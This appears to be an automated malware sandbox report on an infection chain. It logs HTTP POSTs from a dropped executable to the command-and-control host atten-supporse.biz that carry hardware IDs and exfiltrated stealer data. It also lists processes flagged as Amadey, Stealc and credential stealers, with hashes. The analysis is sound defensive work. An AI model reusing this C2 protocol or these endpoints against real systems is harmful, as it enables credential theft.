                                                                                                                                                                                                                                                              2024-12-09 22:09:40 UTC15331OUTData Raw: 2d 2d 47 32 4a 31 41 46 4f 46 49 59 53 4a 45 49 35 38 37 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 32 4a 31 41 46 4f 46 49 59 53 4a 45 49 35 38 37 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 32 4a 31 41 46 4f 46 49 59 53 4a 45 49 35 38 37 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                              Data Ascii: --G2J1AFOFIYSJEI5872MContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--G2J1AFOFIYSJEI5872MContent-Disposition: form-data; name="pid"3--G2J1AFOFIYSJEI5872MContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                              2024-12-09 22:09:40 UTC5118OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                                                                                                                                                                                              2024-12-09 22:09:41 UTC1026INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p45cuiuqm4jfleduo43h4ddegu; expires=Fri, 04-Apr-2025 15:56:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4VhdMFjQGCAx70ptEEoOUhGyE0Ps9%2BfLUIou%2Bv7F3azGKTowUQbqqM2EUkR08SRf%2Fo8hDkEog6sXzTKVuQF%2FyyKP1Oa3lUnOGi5shiMpYsiyT2zbWb8%2B%2FQbmMeEzP3Gd17KVxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef852232ef64231-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1628&rtt_var=616&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21414&delivery_rate=1767554&cwnd=127&unsent_bytes=0&cid=2c78b8073b316e67&ts=1191&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.449880104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:43 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VYB1IEN1977VXUE6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1266
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:43 UTC1266OUTData Raw: 2d 2d 56 59 42 31 49 45 4e 31 39 37 37 56 58 55 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 56 59 42 31 49 45 4e 31 39 37 37 56 58 55 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 59 42 31 49 45 4e 31 39 37 37 56 58 55 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                                                                              Data Ascii: --VYB1IEN1977VXUE6Content-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--VYB1IEN1977VXUE6Content-Disposition: form-data; name="pid"1--VYB1IEN1977VXUE6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                                                                              2024-12-09 22:09:44 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=rv8aalntct70b0f7lrbjrp5go5; expires=Fri, 04-Apr-2025 15:56:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4Tdi11k3tmq612J4mP5VOCNiCXV2emcRH13UBjujKbzvqA%2BYSdkhezo4uOQ1juI16nWRMcbtXg5kmTk%2BJxGhRBoZ3GfbC6rehN4D4SZDa9UGNZSDFeJFvkEGX66OpnPzPcTgB4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef85236effc43b0-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2183&delivery_rate=1755862&cwnd=32&unsent_bytes=0&cid=8bca6c0f58babfc0&ts=746&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.449897104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:46 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=8EOTTZMCWJFVIEQFP2
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20525
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:46 UTC15331OUTData Raw: 2d 2d 38 45 4f 54 54 5a 4d 43 57 4a 46 56 49 45 51 46 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 38 45 4f 54 54 5a 4d 43 57 4a 46 56 49 45 51 46 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 45 4f 54 54 5a 4d 43 57 4a 46 56 49 45 51 46 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                              Data Ascii: --8EOTTZMCWJFVIEQFP2Content-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--8EOTTZMCWJFVIEQFP2Content-Disposition: form-data; name="pid"1--8EOTTZMCWJFVIEQFP2Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                              2024-12-09 22:09:46 UTC5194OUTData Raw: e8 14 42 92 f4 65 7b 97 32 53 b1 c3 de 03 ca 8d 90 09 76 fd ad a9 a0 49 cd 40 38 23 79 bb 3a 62 52 cd 86 95 4c ed 96 8f 7e 93 7b 0a d6 b2 e0 5f 22 07 5e f1 44 ef 71 d4 f0 1a 92 eb 7e a7 d2 16 3a 75 21 c7 b7 d6 05 3f 09 6b c6 53 1d 0d de 24 00 36 e3 c7 0e 00 be 30 bb 93 b5 82 ad 0f d9 9d 19 a9 fe e1 ee af 1b 2a 7f 1c cb a1 6e 47 f5 ff 88 94 46 c9 25 8b 97 b1 72 00 70 ce 6f 3a 7f 2f 89 0f 85 2e c5 ca ca 0a f6 4a 63 2f 38 c5 b9 b0 b9 03 6e ed ea ab be bf e1 ea 82 a0 2f 6b 8f eb 3c 4f 6b e3 f9 ec b3 d5 4f b7 ad 5d ee 9e c8 be d5 2a da 42 c0 ef ec bc f1 cc d5 2f 90 01 b8 d6 7e a8 f6 fe 1c ab f4 95 9b a0 47 8c fa 76 7d 4f 70 28 45 91 af 4a ce 3d 4e 56 d7 dc cc b0 d7 37 72 b7 a6 58 77 c0 e9 c1 6e 97 d1 0f 15 57 0b 83 f0 43 c9 dd 0e ea ad a1 f6 54 68 ec 3e 1f b1
                                                                                                                                                                                                                                                              Data Ascii: Be{2SvI@8#y:bRL~{_"^Dq~:u!?kS$60*nGF%rpo:/.Jc/8n/k<OkO]*B/~Gv}Op(EJ=NV7rXwnWCTh>
                                                                                                                                                                                                                                                              2024-12-09 22:09:47 UTC1026INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=2p8lp08eep50q6h0lltgh7arqr; expires=Fri, 04-Apr-2025 15:56:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gIMhazM4%2BjKANtgmjA1gas3JG6ig%2FOai%2FuChcGXWaXZG5fEl3L%2F3vDsVhG%2FEUlyi%2F4D8H3aAvtQRVjZGwnq5o1mn8Jmf85fMW3gArhENSEbEhraDK5iLEamn5QC2J3WJHqKnEeI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef8524958f77ca5-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1811&rtt_var=681&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21489&delivery_rate=1604395&cwnd=243&unsent_bytes=0&cid=5c1935dd6efaa3a8&ts=1194&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:17:07:53
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:3'210'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:F5DB9DCEA4098275CB46B5D6FE73CEF8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:17:07:56
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                                              File size:3'210'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:F5DB9DCEA4098275CB46B5D6FE73CEF8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:17:07:57
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                                              File size:3'210'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:F5DB9DCEA4098275CB46B5D6FE73CEF8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:17:09:00
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                                              File size:3'210'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:F5DB9DCEA4098275CB46B5D6FE73CEF8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:17:09:13
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
                                                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                                                              File size:1'895'424 bytes
                                                                                                                                                                                                                                                              MD5 hash:52F0F216DFBB86683B1E318A0796DD81
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2576907728.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2520611019.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2543919841.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2545054746.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2543892695.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2497346871.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2545193277.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:17:09:21
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
                                                                                                                                                                                                                                                              Imagebase:0x680000
                                                                                                                                                                                                                                                              File size:1'799'168 bytes
                                                                                                                                                                                                                                                              MD5 hash:CBF2B84F9B993A77C0E2170CCCBACB7C
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:17:09:26
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
                                                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                                                              File size:1'895'424 bytes
                                                                                                                                                                                                                                                              MD5 hash:52F0F216DFBB86683B1E318A0796DD81
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2656254636.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2656059323.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2722206799.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2657437696.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2717480504.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2657790629.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2684316064.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2630205909.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:17:09:28
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                                              File size:971'776 bytes
